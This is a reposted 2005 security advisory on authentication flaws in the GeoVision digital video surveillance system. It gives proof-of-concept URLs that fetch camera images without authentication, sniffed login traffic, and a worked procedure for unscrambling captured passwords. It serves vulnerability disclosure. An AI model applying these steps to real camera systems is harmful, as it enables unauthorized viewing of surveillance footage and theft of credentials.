[转载]GeoVision数字视频监控系统多个权限提升漏洞
信息来源:[url]www.securiteam.com[/url]Summary
"The GeoVision Digital Video Surveillance System is a PCI card based digital video surveillance range for Microsoft Windows platforms. The GeoVision system is expandable to support POS, Central Monitoring Station and License Plate Recognition Systems. The GeoVision system is in use in commercial and residential installations worldwide."
Multiple issues have been found in GeoVision Digital Video Surveillance System, these vulnerabilities revolve around poor authentication mechanisms. These issues allow sniffed authentication credentials to be reused as-is or unscrambled to allow the discovery of the original password. In certain configurations still pictures from security cameras can be viewed without providing any authentication.
Credit:
The information has been provided by Tirath Rai .
The original article can be found at: [url]http://www.esqo.com/research/advisories/2005/100505-1.txt[/url]
Details
Vulnerable Systems:
* GeoVision Digital Video Surveillance System version 7.0 and prior
Privilege Escalation 1:
When the GeoVision software is set to create JPEG images for use via the JPEG Image Viewer it can be seen that no authentication is required to view the JPEG images.
Using GeoVisions own demonstration as an example the following URLs can be used to access images. This is true even for servers who specify that a username and password is required for authentication. In the current GeoVision demonstration only a username is required to access footage. This method works on GeoVision systems which are configured to create JPEG images. It will also work on GeoVision systems which are not configured with the 'Enhanced Network Security' feature. This is understood to be the default setting.
Proof of Concept:
[url]http://webcam.geovision.com.tw/cam0.jpg[/url]
...
[url]http://webcam.geovision.com.tw/cam3.jpg[/url]
Privilege Escalation 2:
During the authentication phase using the live playback client it was seen that the username part of the authentication component is passed in plain text. In this partial dump taken using tcpflow the username is seen to be 'gvUser'.
Network dump of an authentication attempt:
--------------------- Network traffic sniffer ---------------------
192.168.105.136:01187-192.168.105.130:00514: ....
192.168.105.130:04550-192.168.105.136:01186: RDY.
192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
192.168.105.130:04550-192.168.105.136:01186: ...
192.168.105.136:01186-192.168.105.130:04550: 2.
-------------------------------------------------------------------
A simple transformation of the password based on hex values for ASCII characters is used to scramble the password. This scrambling is simple to do in reverse, as seen in the example below.
Sniff from network:
--------------------- Network traffic sniffer ---------------------
192.168.105.130:04550-192.168.105.136:01186: RDY.
192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
192.168.105.130:04550-192.168.105.136:01186: ...
-------------------------------------------------------------------
Here we see the username 'gvUser', still in plain text and the scrambled password '7d6a6666636e'. In order to go to the from the scrambled string to the original password a few simple steps are performed.
Split the string into pairs of hex strings:
0x7d
0x6a
0x66
0x66
0x63
0x6e
Each pair represents one character in the original password, so this scrambled string is for a password of 6 characters.
Iterate through the pairs subtracting a number from each pair starting with 0x6, for the first character as there are 6 characters in this password.
0x7d - 0x6 = 77
0x6a - 0x5 = 65
0x66 - 0x4 = 62
0x66 - 0x3 = 63
0x63 - 0x2 = 61
0x6e - 0x1 = 6d
Then use an ASCII table to translate into characters
0x77 = w
0x65 = e
0x62 = b
0x63 = c
0x61 = a
0x6d = m
So the original password was 'webcam'.
This issue is encountered for all the authentication options below:
Mpeg4 Encoder Viewer
56kMpegView0.htm
LanMpegView0.htm
MultiView.htm
Remote Play Back
PlayBackX.htm
Emap
Emap.htm
For the JPEG Image Viewer (JPGLogin.htm) the authentication credentials are passed using the HTTP POST method completely in plain text. Scrambling is not used - see below.
--------------------- Network traffic sniffer ---------------------
192.168.105.130:34707-192.168.105.136:80 POST /password HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, */*
Referer: [url]http://192.168.105.136/JPGLogin.htm[/url]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 192.168.1.5
Content-Length: 37
Connection: Keep-Alive
Cache-Control: no-cache
id=gvUser&pwd=webcam&send=Submit
-------------------------------------------------------------------
Here the id= value is the username and the pwd= value is the password.
Vendor Status:
The vendor has added in version 7.0 a section known as 'Enhanced Network Security' that suppose to help in fixing this issue, but this option is not set by default.
页:
[1]